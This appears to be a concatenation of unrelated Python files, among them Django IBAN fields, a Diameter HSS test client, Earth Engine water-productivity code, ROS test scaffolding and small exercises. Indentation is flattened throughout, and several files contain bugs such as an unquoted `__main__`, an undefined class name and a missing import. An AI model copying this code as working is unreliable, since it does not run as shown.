#image_path = '../../dataset/lung_crop/images/train/{}.png'.format(row['imageid'])
image_path = f"{image_source}/train/{row['imageid']}.jpg"
yv5_vf.write(image_path + '\n')
|
import prometheus.tftpd
'''
import prometheus.tftpd
prometheus.tftpd.tftpd()
to run:
set PYTHONPATH=p:\lanot\src\core\python
'''
prometheus.tftpd.tftp_client('greenhouse01.iot.oh.wsh.no', 'main.py', 'greenhouse01.py')
# prometheus.tftpd.tftp_client('greenhouse01.iot.oh.wsh.no', 'cacert.pem')
# prometheus.tftpd.tftp_client('greenhouse01.iot.oh.wsh.no', 'cert.pem')
# prometheus.tftpd.tftp_client('greenhouse01.iot.oh.wsh.no', 'key.pem')
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from internationalflavor.iban.validators import BICCleaner, IBANCleaner
from .forms import IBANFormField
from .data import IBAN_MAX_LENGTH
from internationalflavor.iban.forms import BICFormField
from .validators import IBANValidator, BICValidator
class IBANField(models.CharField):
"""A model field that applies the :class:`.validators.IBANValidator` and is represented by a
:class:`.forms.IBANFormField`. The arguments are equal to those of the validator.
Example:
.. code-block:: python
from django.db import models
from internationalflavor.iban import IBANField
class MyModel(models.Model):
iban = IBANField(countries=['NL', 'BE'])
This field is an extension of a CharField.
"""
description = _('An International Bank Account Number')
def __init__(self, countries=None, exclude=None, sepa_only=False, accept_experimental=False, *args, **kwargs):
self.countries = countries
self.exclude = exclude
self.sepa_only = sepa_only
self.accept_experimental = accept_experimental
kwargs.setdefault('max_length', IBAN_MAX_LENGTH)
super(IBANField, self).__init__(*args, **kwargs)
self.validators.append(IBANValidator(countries=countries, exclude=exclude, # pylint: disable=E1101
accept_experimental=accept_experimental, sepa_only=sepa_only))
def deconstruct(self):
name, path, args, kwargs = super(IBANField, self).deconstruct()
if self.countries:
kwargs['countries'] = self.countries
if self.exclude:
kwargs['exclude'] = self.exclude
if self.sepa_only:
kwargs['sepa_only'] = self.sepa_only
if self.accept_experimental:
kwargs['accept_experimental'] = self.accept_experimental
if 'max_length' in kwargs and kwargs["max_length"] == IBAN_MAX_LENGTH:
del kwargs["max_length"]
return name, path, args, kwargs
def to_python(self, value):
value = super(IBANField, self).to_python(value)
if value is not None:
return IBANCleaner()(value)
return value
def formfield(self, **kwargs):
defaults = {'form_class': IBANFormField}
defaults.update(kwargs)
return super(IBANField, self).formfield(**defaults)
class BICField(models.CharField):
"""A model field that applies the :class:`.validators.BICValidator` and is represented by a
:class:`.forms.BICFormField`.
This field is an extension of a CharField.
"""
description = _('An International Bank Code')
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 11)
super(BICField, self).__init__(*args, **kwargs)
self.validators.append(BICValidator()) # pylint: disable=E1101
def deconstruct(self):
name, path, args, kwargs = super(BICField, self).deconstruct()
if 'max_length' in kwargs and kwargs["max_length"] == 11:
del kwargs["max_length"]
return name, path, args, kwargs
def to_python(self, value):
value = super(BICField, self).to_python(value)
if value is not None:
return BICCleaner()(value)
return value
def formfield(self, **kwargs):
defaults = {'form_class': BICFormField}
defaults.update(kwargs)
return super(BICField, self).formfield(**defaults)
|
import libtmux
def ensure_server() -> libtmux.Server:
'''
Either create new or return existing server
'''
return libtmux.Server()
def spawn_session(name: str, kubeconfig_location: str, server: libtmux.Server):
if server.has_session(name):
return
else:
session = server.new_session(name)
session.set_environment("KUBECONFIG", kubeconfig_location)
# the new_session will create default window and pane which will not contain KUBECONFIG, add manually
session.attached_window.attached_pane.send_keys("export KUBECONFIG={}".format(kubeconfig_location))
|
from unittest import TestCase
from db_credentials import DBCredentials
class TestDBCredentials( TestCase ):
def setUp( self ):
self.creds = DBCredentials.DBCredentials()
self.creds.loadFile( '/Users/damonsauve/git/db-credentials/db_credentials/test/test.creds' )
self.test_creds = {
'host' : 'test_database',
'port' : '1521',
'username' : 'test_user',
'password' : 'test_password',
'database' : 'test_database',
}
def test_get_host( self ):
self.assertEqual( self.creds.get_host(), self.test_creds['host'] )
def test_get_port( self ):
self.assertEqual( self.creds.get_port(), self.test_creds['port'] )
def test_get_username( self ):
self.assertEqual( self.creds.get_username(), self.test_creds['username'] )
def test_get_password( self ):
self.assertEqual( self.creds.get_password(), self.test_creds['password'] )
def test_get_database( self ):
self.assertEqual( self.creds.get_database(), self.test_creds['database'] )
if __name__ == "__main__":
unittest.main()
|
#!/usr/bin/env python
##################################################################
# Copyright (c) 2012, Sergej Srepfler <sergej.srepfler@gmail.com>
# February 2012 - March 2012
# Version 0.2.6, Last change on Mar 20, 2012
# This software is distributed under the terms of BSD license.
##################################################################
#Next two lines are to include parent directory for testing
import sys
sys.path.append("..")
# Remove them normally
# HSS client - MAR/MAA for diameter EAP-AKA client
from libDiameter import *
import eap
import datetime
import time
def create_CER():
# Let's build CER
CER_avps=[]
CER_avps.append(encodeAVP("Origin-Host", ORIGIN_HOST))
CER_avps.append(encodeAVP("Origin-Realm", ORIGIN_REALM))
CER_avps.append(encodeAVP("Vendor-Id", 28458))
CER_avps.append(encodeAVP("Origin-State-Id", 1))
CER_avps.append(encodeAVP("Supported-Vendor-Id", 10415))
CER_avps.append(encodeAVP("Auth-Application-Id", 0xFFFFFFFF))
CER_avps.append(encodeAVP("Acct-Application-Id", 0xFFFFFFFF))
# Create message header (empty)
CER=HDRItem()
# Set command code
CER.cmd=dictCOMMANDname2code("Capabilities-Exchange")
# Set Hop-by-Hop and End-to-End
initializeHops(CER)
# Add AVPs to header and calculate remaining fields
msg=createReq(CER,CER_avps)
# msg now contains CER Request as hex string
return msg
def create_SAR():
# Let's build Server-AssignmentRequest
REQ_avps=[]
REQ_avps.append(encodeAVP("Session-Id", SESSION_ID))
REQ_avps.append(encodeAVP("Destination-Realm", DEST_REALM))
REQ_avps.append(encodeAVP("User-Name", IDENTITY))
# 5 - DEREGISTRATION
REQ_avps.append(encodeAVP("Server-Assignment-Type", 5))
# 1 - NO_STATE_MAINTAINED
REQ_avps.append(encodeAVP("Auth-Session-State", 1))
# Grouped AVPs are encoded like this
REQ_avps.append(encodeAVP("Vendor-Specific-Application-Id",[
encodeAVP("Vendor-Id",dictVENDORid2code('TGPP')),
encodeAVP("Auth-Application-Id",APPLICATION_ID)]))
REQ_avps.append(encodeAVP("Origin-Host", ORIGIN_HOST))
REQ_avps.append(encodeAVP("Origin-Realm", ORIGIN_REALM))
# Create message header (empty)
SAR=HDRItem()
# Set command code
SAR.cmd=dictCOMMANDname2code("Server-Assignment")
# Set Application-id
SAR.appId=APPLICATION_ID
# Set Hop-by-Hop and End-to-End
initializeHops(SAR)
# Set Proxyable flag
setFlags(SAR,DIAMETER_HDR_PROXIABLE)
# Add AVPs to header and calculate remaining fields
ret=createReq(SAR,REQ_avps)
# ret now contains SAR Request as hex string
return ret
def create_PPA(H):
# Let's build Push-Profile Answer
# We need Session-Id from Request
PPR_avps=splitMsgAVPs(H.msg)
sesID=findAVP("Session-Id",PPR_avps)
PPA_avps=[]
PPA_avps.append(encodeAVP("Origin-Host", ORIGIN_HOST))
PPA_avps.append(encodeAVP("Origin-Realm", ORIGIN_REALM))
PPA_avps.append(encodeAVP("Session-Id", sesID))
PPA_avps.append(encodeAVP("Result-Code", 2001)) #DIAMETER_SUCCESS 2001
# Create message header (empty)
PPA=HDRItem()
# Set command code
PPA.cmd=H.cmd
# Set Application-id
PPA.appId=H.appId
# Set Hop-by-Hop and End-to-End from request
PPA.HopByHop=H.HopByHop
PPA.EndToEnd=H.EndToEnd
# Add AVPs to header and calculate remaining fields
ret=createRes(PPA,PPA_avps)
# ret now contains PPA Response as hex string
return ret
def create_Session_Id():
#The Session-Id MUST be globally and eternally unique
#<DiameterIdentity>;<high 32 bits>;<low 32 bits>[;<optional value>]
now=datetime.datetime.now()
ret=ORIGIN_HOST+";"
ret=ret+str(now.year)[2:4]+"%02d"%now.month+"%02d"%now.day
ret=ret+"%02d"%now.hour+"%02d"%now.minute+";"
ret=ret+"%02d"%now.second+str(now.microsecond)+";"
ret=ret+IDENTITY[2:16]
return ret
if __name__ == "__main__":
#logging.basicConfig(level=logging.DEBUG)
LoadDictionary("../dictDiameter.xml")
eap.LoadEAPDictionary("../dictEAP.xml")
################
HOST="10.14.5.148"
PORT=3868
ORIGIN_HOST="client.test.com"
ORIGIN_REALM="test.com"
IDENTITY="262022503508143"
#ETYPE="EAP-SIM"
ETYPE="EAP-AKA"
#ETYPE="EAP-AKA'"
if ETYPE=="EAP-SIM":
# 3GPP SWx=16777265 STa=16777250 S6b=16777272 Wx=16777219
APPLICATION_ID=16777219
else:
APPLICATION_ID=16777265
# Let's assume that my Diameter messages will fit into 4k
MSG_SIZE=4096
# Connect to server
Conn=Connect(HOST,PORT)
###########################################################
# Let's build CER
msg=create_CER()
# msg now contains CER Request as hex string
logging.debug("+"*30)
# send data
Conn.send(msg.decode("hex"))
# Receive response
received = Conn.recv(MSG_SIZE)
# split header and AVPs
CEA=HDRItem()
stripHdr(CEA,received.encode("hex"))
# From CEA we needed Destination-Host and Destination-Realm
Capabilities_avps=splitMsgAVPs(CEA.msg)
print Capabilities_avps
DEST_HOST=findAVP("Origin-Host",Capabilities_avps)
DEST_REALM=findAVP("Origin-Realm",Capabilities_avps)
###########################################################
# Receive response
received = Conn.recv(MSG_SIZE)
print "Received PPR",received.encode("hex")
PPR=HDRItem()
stripHdr(PPR,received.encode("hex"))
###########################################################
SESSION_ID=create_Session_Id()
msg=create_SAR()
# msg now contains SAR as hex string
logging.debug("+"*30)
# send data
Conn.send(msg.decode("hex"))
# Receive response
received = Conn.recv(MSG_SIZE)
###########################################################
msg=create_PPA(PPR)
# msg now contains STA as hex string
logging.debug("+"*30)
# send data
Conn.send(msg.decode("hex"))
# And close the connection
Conn.close()
|
#!/usr/bin/python3
# Converts nsi_presets.json to a sqlite db
# Not currently used, but maybe in the future when NSI is unbearably large
#
# Output can be piped to sqlite3 to create the database
import json
file = open("nsi_presets.json")
data = json.load(file)
print("create table brands(id INTEGER, identifier TEXT, name TEXT, icon TEXT, geometry INTEGER, matchScore REAL, imageURL TEXT );")
print("create table locationSet(id INTEGER, location TEXT, include INTEGER, foreign key (id) references brands(id));")
print("create table terms(id INTEGER, term TEXT, foreign key (id) references brands(id));")
print("create table tags(id INTEGER, key TEXT, value TEXT, foreign key (id) references brands(id));")
print("create table addTags(id INTEGER, key TEXT, value TEXT, foreign key (id) references brands(id));")
geom_map={
"point": 1,
"line": 2,
"vertex": 4,
"area": 8,
"relation": 16
}
location_map={
"include": 1,
"exclude": 0
}
id = -1
presets = data["presets"]
for identifier in presets:
id += 1
dict = presets[identifier]
name = dict["name"]
icon = dict["icon"]
geom = 0
for g in dict["geometry"]:
geom += geom_map[g]
matchScore = dict["matchScore"]
imageURL = dict.get("imageURL")
identifier = ""
imageURL = ""
print(f'insert into brands(id,identifier,name,icon,geometry,matchScore,imageURL) values ({id},"{identifier}","{name}","{icon}","{geom}","{matchScore}","{imageURL}");')
tags = dict["tags"]
for key in tags:
value = tags[key].replace('"','""')
print(f'insert into tags(id,key,value) values ("{id}","{key}","{value}");')
addTags = dict["addTags"]
for key in addTags:
value = addTags[key].replace('"','""')
print(f'insert into addTags(id,key,value) values ("{id}","{key}","{value}");')
terms = dict["terms"]
for term in terms:
term = term.replace('"','""')
print(f'insert into terms(id,term) values ("{id}","{term}");')
locationSet = dict["locationSet"]
for loc in locationSet:
include = location_map[loc]
for code in locationSet[loc]:
print(f'insert into locationSet(id,location,include) values ("{id}","{code}",{include});')
|
#!/usr/bin/python
from mod_pywebsocket import msgutil
import time
import urllib
def web_socket_do_extra_handshake(request):
msgutil._write(request, 'x')
time.sleep(2)
def web_socket_transfer_data(request):
msgutil._write(request, urllib.unquote(request.ws_location.split('?', 1)[1]).decode("string-escape"))
time.sleep(2)
|
import mgear.core.pyqt as gqt
from mgear.vendor.Qt import QtCore, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(344, 635)
self.verticalLayout_3 = QtWidgets.QVBoxLayout(Form)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.tools_groupBox = QtWidgets.QGroupBox(Form)
self.tools_groupBox.setObjectName("tools_groupBox")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tools_groupBox)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.settings_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.settings_pushButton.setObjectName("settings_pushButton")
self.verticalLayout_2.addWidget(self.settings_pushButton)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.duplicate_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.duplicate_pushButton.setObjectName("duplicate_pushButton")
self.horizontalLayout.addWidget(self.duplicate_pushButton)
self.dupSym_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.dupSym_pushButton.setObjectName("dupSym_pushButton")
self.horizontalLayout.addWidget(self.dupSym_pushButton)
self.extrCtl_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.extrCtl_pushButton.setObjectName("extrCtl_pushButton")
self.horizontalLayout.addWidget(self.extrCtl_pushButton)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.build_pushButton = QtWidgets.QPushButton(self.tools_groupBox)
self.build_pushButton.setObjectName("build_pushButton")
self.verticalLayout_2.addWidget(self.build_pushButton)
self.verticalLayout_3.addWidget(self.tools_groupBox)
self.list_groupBox = QtWidgets.QGroupBox(Form)
self.list_groupBox.setObjectName("list_groupBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.list_groupBox)
self.verticalLayout.setObjectName("verticalLayout")
self.search_lineEdit = QtWidgets.QLineEdit(self.list_groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.search_lineEdit.sizePolicy().hasHeightForWidth())
self.search_lineEdit.setSizePolicy(sizePolicy)
self.search_lineEdit.setObjectName("search_lineEdit")
self.verticalLayout.addWidget(self.search_lineEdit)
self.splitter = QtWidgets.QSplitter(self.list_groupBox)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.component_listView = DragQListView(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.component_listView.sizePolicy().hasHeightForWidth())
self.component_listView.setSizePolicy(sizePolicy)
self.component_listView.setMinimumSize(QtCore.QSize(0, 0))
self.component_listView.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.component_listView.setProperty("showDropIndicator", False)
self.component_listView.setDragDropMode(QtWidgets.QAbstractItemView.NoDragDrop)
self.component_listView.setDefaultDropAction(QtCore.Qt.CopyAction)
self.component_listView.setAlternatingRowColors(True)
self.component_listView.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.component_listView.setObjectName("component_listView")
self.info_plainTextEdit = QtWidgets.QPlainTextEdit(self.splitter)
self.info_plainTextEdit.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.info_plainTextEdit.sizePolicy().hasHeightForWidth())
self.info_plainTextEdit.setSizePolicy(sizePolicy)
self.info_plainTextEdit.setMinimumSize(QtCore.QSize(0, 50))
self.info_plainTextEdit.setMaximumSize(QtCore.QSize(16777215, 100))
self.info_plainTextEdit.setBaseSize(QtCore.QSize(0, 50))
self.info_plainTextEdit.setUndoRedoEnabled(False)
self.info_plainTextEdit.setReadOnly(True)
self.info_plainTextEdit.setPlainText("")
self.info_plainTextEdit.setObjectName("info_plainTextEdit")
self.verticalLayout.addWidget(self.splitter)
self.draw_pushButton = QtWidgets.QPushButton(self.list_groupBox)
self.draw_pushButton.setObjectName("draw_pushButton")
self.verticalLayout.addWidget(self.draw_pushButton)
self.showUI_checkBox = QtWidgets.QCheckBox(self.list_groupBox)
self.showUI_checkBox.setChecked(True)
self.showUI_checkBox.setObjectName("showUI_checkBox")
self.verticalLayout.addWidget(self.showUI_checkBox)
self.verticalLayout_3.addWidget(self.list_groupBox)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(gqt.fakeTranslate("Form", "Form", None, -1))
self.tools_groupBox.setTitle(gqt.fakeTranslate("Form", "Guide Tools", None, -1))
self.settings_pushButton.setWhatsThis(gqt.fakeTranslate("Form", "<html><head/><body><p>Open Component/Guide root settings window.</p></body></html>", None, -1))
self.settings_pushButton.setText(gqt.fakeTranslate("Form", "Settings", None, -1))
self.duplicate_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Duplicate selected component.</p></body></html>", None, -1))
self.duplicate_pushButton.setText(gqt.fakeTranslate("Form", "Duplicate", None, -1))
self.dupSym_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Duplicate symmetrical selected component.</p></body></html>", None, -1))
self.dupSym_pushButton.setText(gqt.fakeTranslate("Form", "Dupl. Sym.", None, -1))
self.extrCtl_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Extract Selected Controls and store as control Buffer.</p></body></html>", None, -1))
self.extrCtl_pushButton.setText(gqt.fakeTranslate("Form", "Extr. Ctl.", None, -1))
self.build_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Build rig from selection</p></body></html>", None, -1))
self.build_pushButton.setWhatsThis(gqt.fakeTranslate("Form", "<html><head/><body><p>Open Component/Guide root settings window.</p></body></html>", None, -1))
self.build_pushButton.setText(gqt.fakeTranslate("Form", "Build From Selection", None, -1))
self.list_groupBox.setTitle(gqt.fakeTranslate("Form", "Component List", None, -1))
self.draw_pushButton.setToolTip(gqt.fakeTranslate("Form", "<html><head/><body><p>Draw selected component.</p></body></html>", None, -1))
self.draw_pushButton.setText(gqt.fakeTranslate("Form", "Draw Component", None, -1))
self.showUI_checkBox.setText(gqt.fakeTranslate("Form", "Show Setting After Create New Component.", None, -1))
from mgear.core.widgets import DragQListView
|
import os, pytest
from pathlib import Path
from ..fast import FAST
@pytest.mark.parametrize("inputs, outputs", [])
def test_FAST(test_data, inputs, outputs):
in_file = Path(test_data) / "test.nii.gz"
if inputs is None:
inputs = {}
for key, val in inputs.items():
try:
inputs[key] = eval(val)
except:
pass
task = FAST(in_file=in_file, **inputs)
assert set(task.generated_output_names) == set(
["return_code", "stdout", "stderr"] + outputs
)
@pytest.mark.parametrize("inputs, error", [(None, "AttributeError")])
def test_FAST_exception(test_data, inputs, error):
in_file = Path(test_data) / "test.nii.gz"
if inputs is None:
inputs = {}
for key, val in inputs.items():
try:
inputs[key] = eval(val)
except:
pass
task = FAST(in_file=in_file, **inputs)
with pytest.raises(eval(error)):
task.generated_output_names
|
import rospy
import tf2_ros as tf
import queue
from threading import Thread
class TestResult:
def __init__(self, name, msg):
self.success = False
self.msg = msg
self.name = name
self.timed_out = False
def set_result(self, value):
self.success = value
def print(self):
text = ": " + self.msg if not self.success else ""
print_method = rospy.loginfo if self.success else rospy.logerr
success_text = self.success if not self.timed_out else "Failed: TimedOut"
print_method(f" Test {self.name}: {success_text} {text}")
def report_timedout(self):
self.timed_out = True
class TestClass:
def __init__(self, name, requires_tf):
rospy.init_node(name)
self.test_idx = 0
self.test_results = []
self.test_handles = []
self.is_finished = False
self.test_data = {}
self.queue = queue.Queue()
if requires_tf:
#tf setup
self.tf_Buffer = tf.Buffer(rospy.Duration(10))
self.tf_listener = tf.TransformListener(self.tf_Buffer)
self.tf_broadcaster = tf.TransformBroadcaster()
self.tf_static_broadcaster = tf.StaticTransformBroadcaster()
def dispatch_to_main_thread(self, func):
self.queue.put(func)
# Adds a delegate/handle to the test list, which will be called as soon as
# TestClass.advance_test() is called
def register_test_handle(self, name, msg, handle):
self.test_handles.append(handle)
self.test_results.append(TestResult(name, msg))
self.test_data[len(self.test_handles)-1] = {}
def get_test_idx(self, handle):
return self.test_handles.index(handle)
# Starts the next test
def advance_test(self, index, current_succcss):
if index != self.test_idx:
return
self.test_results[self.test_idx].set_result(current_succcss)
if len(self.test_results) > self.test_idx + 1:
self.test_idx += 1
# Start the next test
self.run_next_test()
else:
# Log the test results to the screen
self.test_idx = 999
self.report_tests_finished()
def run_next_test(self):
rospy.loginfo(f"Starting Test {self.test_idx}: {self.test_results[self.test_idx].name}")
self.dispatch_to_main_thread(self.test_handles[self.test_idx])
idx = self.test_idx
thread = Thread(target = self.wait_for_timeout, args=[idx])
thread.start()
def wait_for_timeout(self, idx):
rospy.sleep(3)
if self.test_idx == idx:
self.test_results[idx].report_timedout()
self.advance_test(idx, False)
# Reports the results of this test
def report_tests_finished(self):
rospy.loginfo("Tests are finished. Now printing results: ")
for result in self.test_results:
result.print()
if any([not result.success for result in self.test_results]):
rospy.logerr("At least one test failed!")
self.is_finished = True
# Waits for the self.is_finished field to return True and then lets the node die
def run(self):
if len(self.test_handles) > 0:
self.run_next_test()
while not self.is_finished:
try:
callback = self.queue.get(False) #doesn't block
thread = Thread(target=callback)
thread.start()
except queue.Empty:
pass
rospy.sleep(0.1)
else:
rospy.loginfo("This TestNode did not register any tests")
|
import unittest
from . import test_column
from . import test_map_mooring
from . import test_loading
from . import test_substructure
from . import test_floating
def suite():
suite = unittest.TestSuite( (test_column.suite(),
test_map_mooring.suite(),
test_loading.suite(),
test_substructure.suite(),
test_floating.suite()
) )
return suite
if __name__ == '__main__':
unittest.TextTestRunner().run(suite())
|
n1 = int(input('Digite um valor: '))
n2 = int(input('Digite outro valor: '))
operacao = 0
print('Escolha uma opção:\n1. Somar\n2. Multiplicar\n3. Maior.\n4. Novos números.\n5. Sair do programa')
while operacao != 5:
operacao = int(input())
if operacao == 1:
print('{} + {} = {}'.format(n1, n2, n1 + n2))
elif operacao == 2:
print('{} x {} = {}'.format(n1, n2, n1 * n2))
elif operacao == 3:
if n1 > n2:
print('{} é o maior valor.'.format(n1))
else:
print('{} é o maior valor.'.format(n2))
elif operacao == 4:
n1 = int(input('Digite um valor: '))
n2 = int(input('Digite outro valor: '))
print('{:=^40}'.format('FIM'))
|
import config
import urllib.parse
import datetime
import traceback
import time
# import tqdm
import zlib
import settings
import datetime
import sqlalchemy.exc
from sqlalchemy import or_
from sqlalchemy import and_
from sqlalchemy import func
from sqlalchemy import text
import common.database as dbm
import RawArchiver.RawActiveModules
import RawArchiver.TimedTriggers.TriggerBase
import RawArchiver.misc as raw_misc
import RawArchiver.RawUrlUpserter
class RollingRawUrlStartTrigger(RawArchiver.TimedTriggers.TriggerBase.TriggerBaseClass):
pluginName = "RollingRewalk Trigger"
loggerPath = 'Main.RollingRawRewalker'
def retrigger_urls(self, url_list):
self.log.info("Retrigging %s urls", len(url_list))
with self.db.session_context(override_timeout_ms=1000*60*15) as sess:
for url in url_list:
epoch = raw_misc.get_epoch_for_url(url)
nl = urllib.parse.urlsplit(url).netloc
linksd = [{
'url' : url,
'starturl' : url,
'netloc' : nl,
'distance' : dbm.DB_DEFAULT_DIST,
'priority' : dbm.DB_MED_PRIORITY,
'state' : "new",
'addtime' : datetime.datetime.now(),
# Don't retrigger unless the ignore time has elaped.
'epoch' : raw_misc.get_epoch_for_url(url, nl),
}]
RawArchiver.RawUrlUpserter.do_link_batch_update_sess(self.log, sess, linksd)
row = sess.query(self.db.RawWebPages) \
.filter(self.db.RawWebPages.url == url) \
.scalar()
print(row, row.state, row.epoch)
def go(self):
print("Startup?")
self.log.info("Rolling re-trigger of starting URLs.")
starturls = []
for module in RawArchiver.RawActiveModules.ACTIVE_MODULES:
for url in module.get_start_urls():
nl = urllib.parse.urlsplit(url).netloc
self.log.info("Interval: %s, netloc: %s", module.rewalk_interval, nl)
starturls.append(url)
self.retrigger_urls(starturls)
if __name__ == "__main__":
import logSetup
logSetup.initLogging()
run = RollingRawRewalkTrigger()
run.go()
# run._go()
|
'''
Matrix Chain Multiplication
Send Feedback Given a chain of matrices A1, A2, A3,.....An, you have to figure out the most efficient way to multiply these matrices. In other words, determine where to place parentheses to minimize the number of multiplications. You will be given an array p[] of size n + 1. Dimension of matrix Ai is p[i - 1]*p[i]. You need to find minimum number of multiplications needed to multiply the chain.
'''
import sys
from sys import stdin
def matrixChainMemoised(p, i, j):
if(i == j):
return 0
if(dp[i][j] != -1):
return dp[i][j]
dp[i][j] = sys.maxsize
for k in range(i,j):
dp[i][j] = min(dp[i][j], matrixChainMemoised(p, i, k) + matrixChainMemoised(p, k + 1, j)+ p[i - 1] * p[k] * p[j])
return dp[i][j]
def mcm(p,n):
i = 1
j = n - 1
return matrixChainMemoised(p, i, j)
#main
n=int(stdin.readline().strip())
dp = [[-1 for j in range(n+1)]for i in range(n+1)]
p=[int(i) for i in stdin.readline().strip().split()]
n=len(p)
print(mcm(p,n))
|
# coding: utf-8
import ee
import datetime
import ee.mapclient
region = [[-25.0, -37.0], [60.0, -41.0],
[58.0, 39.0], [-31.0, 38.0], [-25.0, -37.0]]
VisPar_AGBPy = {"opacity": 0.85, "bands": "b1", "min": 0, "max":
12000, "palette": "f4ffd9,c8ef7e,87b332,566e1b",
"region": region}
VisPar_ETay = {"opacity": 0.85, "bands": "b1", "min": 0, "max":
2000, "palette": "d4ffc6,beffed,79c1ff,3e539f",
"region": region}
VisPar_WPbm = {"opacity": 0.85, "bands": "b1", "min": 0, "max": 1.2,
"palette": "bc170f,e97a1a,fff83a,9bff40,5cb326",
"region": region}
ee.Initialize()
collAGBP = ee.ImageCollection("projects/fao-wapor/L1_AGBP250")
collAET = ee.ImageCollection("users/lpeiserfao/AET250")
rasterSeason1 = ee.Image(collAGBP.first())
coordinate = rasterSeason1.get('system:footprint')
index = rasterSeason1.get('system:index')
def GEE_calc(agb_pass, aet_pass):
# Above Ground Biomass Production with masked NoData (pixel < 0)
L1_AGBPSeasonalMasked = agb_pass.map(
lambda lista: lista.updateMask(lista.gte(0)))
# .multiply(10); the multiplier will need to be
# applied on net FRAME delivery, not on sample dataset
L1_AGBPSummedYearly = L1_AGBPSeasonalMasked.sum()
# Actual Evapotranspiration with valid ETa values (>0 and <254)
ETaColl1 = aet_pass.map(
lambda immagine: immagine.updateMask
(immagine.lt(254) and (immagine.gt(0))))
# add image property (days in dekad) as band
ETaColl2 = ETaColl1.map(
lambda immagine: immagine.addBands(immagine.metadata('days_in_dk')))
# get ET value, divide by 10 (as per FRAME spec) to get daily value, and
# multiply by number of days in dekad summed annuallyS
ETaColl3 = ETaColl2.map(lambda immagine: immagine.select(
'b1').divide(10).multiply(immagine.select('days_in_dk'))).sum()
# scale ETsum from mm/m² to m³/ha for WP calculation purposes
ETaTotm3 = ETaColl3.multiply(10)
# calculate biomass water productivity and add to map
WPbm = L1_AGBPSummedYearly.divide(ETaTotm3)
return WPbm
def selectRastersInput():
data_start = datetime.datetime(2015, 1, 1)
data_end = datetime.datetime(2015, 2, 1)
collAGBPFiltered = collAGBP.filterDate(
data_start,
data_end)
collAETFiltered = collAET.filterDate(
data_start,
data_end)
return collAGBPFiltered, collAETFiltered
def main(args=None):
# setup_logging()
# parser = argparse.ArgumentParser(description='WaPOR Dekad Analysis')
agb = selectRastersInput()[0]
aet = selectRastersInput()[1]
wp = GEE_calc(agb, aet)
ee.mapclient.addToMap(wp, VisPar_WPbm, 'Annual biomass water productivity')
ee.mapclient.centerMap(17.75, 10.14, 4)
if __name__ == '__main__':
main()
|
# -*- coding:utf-8 -*-
# !/usr/bin/env python3
"""
"""
def test_print_num():
from minghu6.algs.pprint import print_num
result = print_num(10000000000, split_len=3, split_char='_', need_print=False)
assert result == '10_000_000_000'
if __name__ == '__main__':
test_print_num()
|
# -*- coding: utf-8 -*-
"""Untitled13.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1bREcXDsoDGSvarUHDBVYKuh8AFtpRFD1
"""
import numpy as np
import matplotlib.pyplot as plt
ket_basis_0=np.array([[1],[0]])
print(ket_basis_0)
ket_basis_1=np.array([[0],[1]])
print(ket_basis_1)
def check_validity(qubit):
inner_product=np.dot(qubit,qubit.conjugate().transpose())
if inner_product==1:
print("Tne entered qubit is Valid")
else:
print("The entered qubit is Invalid")
def inner_product(qubit):
inner_product=np.dot(qubit,qubit.conjugate().transpose())
print(inner_product)
# Take input qubit from the user
list_qubit_value=[]
def input_qubit():
repeat=False
while not repeat:
qubit_value=int(input("Enter qubit value: "))
list_qubit_value.append(qubit_value)
cntinue=input("Continue yes(y) or no(n): ")
if cntinue=='n':
repeat=True
return list_qubit_value
input_qubit()
bra_input_qubit=np.array([list_qubit_value])
ket_input_qubit=bra_input_qubit.conjugate().transpose()
print("Your qubit is: \n",ket_input_qubit)
print()
inner_product(bra_input_qubit)
check_validity(bra_input_qubit)
density_matrix=np.kron(ket_input_qubit,bra_input_qubit)
print("The density matrix of the qubit is: \n",density_matrix)
|
import boto3
def main():
ec2 = boto3.client('ec2', region_name='eu-west-1')
print(ec2.describe_instances())
print("coucou !")
if __name__==__main__:
main()
|
from __future__ import print_function
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import numpy as np
import os
######################################
######### Necessary Flags ############
######################################
tf.app.flags.DEFINE_string(
'train_root', os.path.dirname(os.path.abspath(__file__)) + '/train_logs',
'Directory where event logs are written to.')
tf.app.flags.DEFINE_string(
'checkpoint_root',
os.path.dirname(os.path.abspath(__file__)) + '/checkpoints',
'Directory where checkpoints are written to.')
